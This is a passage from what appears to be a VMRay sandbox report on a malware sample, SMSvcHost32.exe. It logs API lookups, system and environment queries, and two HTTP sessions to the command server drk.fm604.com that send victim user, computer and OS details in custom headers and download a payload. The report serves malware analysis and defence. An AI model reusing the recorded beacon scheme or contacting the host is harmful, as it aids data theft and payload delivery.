| Get Address | c:\windows\syswow64\gdi32.dll | function = DeleteObject, address_out = 0x76f80810 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SelectObject, address_out = 0x76f80440 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = CreateCompatibleBitmap, address_out = 0x76f82390 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = DeleteDC, address_out = 0x76f80d00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDIBits, address_out = 0x76f81580 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = CreateCompatibleDC, address_out = 0x76f82050 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlUnwind, address_out = 0x779c33a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memmove, address_out = 0x779dcc90 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = wcschr, address_out = 0x779de7a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = _stricmp, address_out = 0x779db580 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strncmp, address_out = 0x779ddea0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memchr, address_out = 0x779dc820 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strncpy, address_out = 0x779ddf60 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strstr, address_out = 0x779de1a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = _aullrem, address_out = 0x779da880 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strcspn, address_out = 0x779ddc80 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = wcsstr, address_out = 0x779deaa0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strchr, address_out = 0x779ddb20 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = wcsrchr, address_out = 0x779dea00 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
2 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strrchr, address_out = 0x779de110 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = VerSetConditionMask, address_out = 0x779c1a40 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtUnmapViewOfSection, address_out = 0x779d6f40 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwClose, address_out = 0x779d6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtCreateSection, address_out = 0x779d7140 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQueryVirtualMemory, address_out = 0x779d6ed0 |
|
1 | |
| Get Address | Unknown module name | function = SCardEstablishContext, address_out = 0x6fe2c590 |
|
1 | |
| Get Address | Unknown module name | function = SCardFreeMemory, address_out = 0x6fe2c9c0 |
|
1 | |
| Get Address | Unknown module name | function = SCardDisconnect, address_out = 0x6fe2c410 |
|
1 | |
| Get Address | Unknown module name | function = SCardListReadersA, address_out = 0x6fe31ff0 |
|
1 | |
| Get Address | Unknown module name | function = SCardConnectA, address_out = 0x6fe30e30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779bd830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x765ba2b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779bf730 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x765ba290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x765b9bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x765e2430 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileAttributesW, address_out = 0x765c6c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x765c6f60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SystemTimeToTzSpecificLocalTime, address_out = 0x765c5c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x765c6fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RaiseException, address_out = 0x765b8c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x765ba790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x765b8500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x765c5140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x765c6a10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileExW, address_out = 0x765c6940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x765b7950 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x765c6730 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765bb0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x765e2670 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatW, address_out = 0x765bf7f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatW, address_out = 0x765bfd90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringW, address_out = 0x765c2630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoW, address_out = 0x765bcd70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocale, address_out = 0x765bab40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLCID, address_out = 0x765c2920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesW, address_out = 0x765bff10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushConsoleInputBuffer, address_out = 0x765c7080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalMemoryStatus, address_out = 0x765b8e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetWindowsDirectoryA, address_out = 0x765bb060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DebugBreak, address_out = 0x765e0920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputW, address_out = 0x765c6fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCursorInfo, address_out = 0x765c70b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FillConsoleOutputAttribute, address_out = 0x765c7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleCursorInfo, address_out = 0x765c71a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x765c70c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FillConsoleOutputCharacterW, address_out = 0x765c7070 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x765c7020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleCursorPosition, address_out = 0x765c71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x765c7000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x765c6fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleTextAttribute, address_out = 0x765c71f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNumberOfConsoleInputEvents, address_out = 0x765c6f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileA, address_out = 0x765c6880 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x765baac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsA, address_out = 0x765c5dd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x765c4f80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatA, address_out = 0x765bf640 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765ba720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x765ba7e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVolumeInformationA, address_out = 0x765c6b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x765ba940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x765c67d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineA, address_out = 0x765bab60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsBadCodePtr, address_out = 0x765bd0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x765b2af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DisableThreadLibraryCalls, address_out = 0x765ba860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetProcessWorkingSetSize, address_out = 0x765c0120 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x765b1b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapDestroy, address_out = 0x765c4c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapCreate, address_out = 0x765ba100 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FileTimeToDosDateTime, address_out = 0x765c2930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x765ba840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempFileNameA, address_out = 0x765c6b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FileTimeToLocalFileTime, address_out = 0x765c68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandle, address_out = 0x765c6a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempPathA, address_out = 0x765c6b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileA, address_out = 0x765c68b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 200, address_out = 0x76b99590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x765ba980 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x765c4ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x765b7570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x765b9e30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x765c6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x765c66a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x765c6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x765bb040 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x765bace0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779a7dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779b4010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779b2a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x765ba7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779b2290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779b2910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779d7a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779cac00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779ba890 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x765bac80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x765e0830 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x775f6270 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x765bfe80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x765bff80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x765e0e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x765ba750 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x765e1240 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x765bad60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x765e1460 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x765b9a10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7757ded0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x765b3630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlPcToFileHeader, address_out = 0x779b5100 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtDeviceIoControlFile, address_out = 0x779d6cf0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQueryInformationFile, address_out = 0x779d6d90 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtSetInformationFile, address_out = 0x779d6f10 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQueryVolumeInformationFile, address_out = 0x779d7130 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQueryDirectoryFile, address_out = 0x779d6ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x779d7000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetQueuedCompletionStatusEx, address_out = 0x765e10f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileCompletionNotificationModes, address_out = 0x765b9dd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CancelIoEx, address_out = 0x765bf450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77986710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x775f7f60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableSRW, address_out = 0x775f7fb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x779c8d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x779cc720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CancelSynchronousIo, address_out = 0x765e05a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFinalPathNameByHandleW, address_out = 0x765c6ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\powrprof.dll | function = PowerRegisterSuspendResumeNotification, address_out = 0x74775ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWinEventHook, address_out = 0x7782fc00 |
|
1 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetStatisticsGet, address_out = 0x77492a40 |
|
1 | |
| Get Address | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | function = _OPENSSL_isservice, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetCursorInfo, address_out = 0x7784c160 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetQueueStatus, address_out = 0x7782e1b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseToolhelp32Snapshot, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Heap32First, address_out = 0x765e3f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Heap32Next, address_out = 0x765e4270 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Heap32ListFirst, address_out = 0x765e4120 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Heap32ListNext, address_out = 0x765e41d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32First, address_out = 0x765bf4d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32Next, address_out = 0x765bd1c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Thread32First, address_out = 0x765c5c50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Thread32Next, address_out = 0x765c5150 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Module32First, address_out = 0x765e44b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Module32Next, address_out = 0x765e4660 |
|
1 | |
| Get Address | c:\windows\syswow64\iphlpapi.dll | function = GetNetworkParams, address_out = 0x71d3c4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\iphlpapi.dll | function = GetAdaptersAddresses, address_out = 0x71d35b70 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SystemFunction036, address_out = 0x74682a60 |
|
1 |
System (147)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = X2VS1CUM |
|
4 | |
| Sleep | duration = 500 milliseconds (0.500 seconds) |
|
8 | |
| Get Time | type = Ticks, time = 153500 |
|
1 | |
| Get Time | type = System Time, time = 2018-12-13 14:01:47 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 166734 |
|
1 | |
| Get Time | type = Ticks, time = 166765 |
|
1 | |
| Get Time | type = Ticks, time = 166781 |
|
1 | |
| Get Time | type = Ticks, time = 166828 |
|
1 | |
| Get Time | type = Ticks, time = 166843 |
|
1 | |
| Get Time | type = Ticks, time = 166875 |
|
1 | |
| Get Time | type = Ticks, time = 166890 |
|
1 | |
| Get Time | type = Ticks, time = 166921 |
|
1 | |
| Get Time | type = Ticks, time = 166953 |
|
1 | |
| Get Time | type = Ticks, time = 167000 |
|
1 | |
| Get Time | type = Ticks, time = 167015 |
|
1 | |
| Get Time | type = Ticks, time = 167281 |
|
1 | |
| Get Time | type = Ticks, time = 167296 |
|
1 | |
| Get Time | type = Ticks, time = 167359 |
|
1 | |
| Get Time | type = Ticks, time = 167375 |
|
1 | |
| Get Time | type = Ticks, time = 167468 |
|
1 | |
| Get Time | type = Ticks, time = 167484 |
|
1 | |
| Get Time | type = Ticks, time = 167609 |
|
1 | |
| Get Time | type = Ticks, time = 167625 |
|
1 | |
| Get Time | type = Ticks, time = 167921 |
|
8 | |
| Get Time | type = Ticks, time = 167937 |
|
19 | |
| Get Time | type = Ticks, time = 167953 |
|
10 | |
| Get Time | type = Ticks, time = 168093 |
|
6 | |
| Get Time | type = Ticks, time = 168109 |
|
19 | |
| Get Time | type = Ticks, time = 168125 |
|
16 | |
| Get Time | type = Ticks, time = 168187 |
|
2 | |
| Get Time | type = System Time, time = 2018-12-13 14:01:49 (UTC) |
|
2 | |
| Get Time | type = System Time, time = 2018-12-13 14:01:50 (UTC) |
|
18 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
5 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
6 | |
| Get Info | type = Operating System |
|
2 |
Environment (8)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = crackmeololo |
|
2 | |
| Get Environment String | - |
|
1 | |
| Get Environment String | name = NODE_CHANNEL_FD |
|
1 | |
| Get Environment String | name = USERNAME, result_out = Nd9E1FYi |
|
1 | |
| Get Environment String | name = startupObject |
|
1 | |
| Get Environment String | name = NODE_HEAPDUMP_OPTIONS |
|
1 | |
| Get Environment String | name = NODE_DEBUG |
|
1 |
Debug (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = WMA 0 |
|
1 | ||
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = WMA 3 |
|
1 | ||
| c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | type = DEBUG_STRING, text = 3512:C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz Ignition.... |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Hostname | - |
|
1 |
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 493 bytes |
| Total Data Received | 124.52 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | drk.fm604.com |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | drk.fm604.com |
| Server Port | 443 |
| Data Sent | 247 |
| Data Received | 12 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Open Connection | protocol = HTTP, server_name = drk.fm604.com, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rbody320, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 2816 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = drk.fm604.com/rbody320 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 512, size_out = 4 |
|
1 | |
| Read Response | size = 512, size_out = 0 |
|
1 | |
| Close Session | - |
|
2 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0 |
| Server Name | drk.fm604.com |
| Server Port | 443 |
| Data Sent | 246 |
| Data Received | 127496 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Open Connection | protocol = HTTP, server_name = drk.fm604.com, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rbody32, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Add HTTP Request Headers | headers = X-VendorId: 2816 |
|
1 | |
| Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = drk.fm604.com/rbody32 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 512, size_out = 512 |
|
249 | |
| Close Session | - |
|
2 |
Process #8: safari.exe
0
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\program files (x86)\msecache\safari.exe |
| Command Line | "C:\Program Files (x86)\MSECache\safari.exe" |
| Initial Working Directory | C:\Program Files (x86)\MSECache\ |
| Monitor | Start Time: 00:01:10, Reason: Injection |
| Unmonitor | End Time: 00:02:24, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:14 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc3c |
| Parent PID | 0x84c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
14C
0x
C44
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00093fff | Pagefile Backed Memory | r |
|
|
|
- |
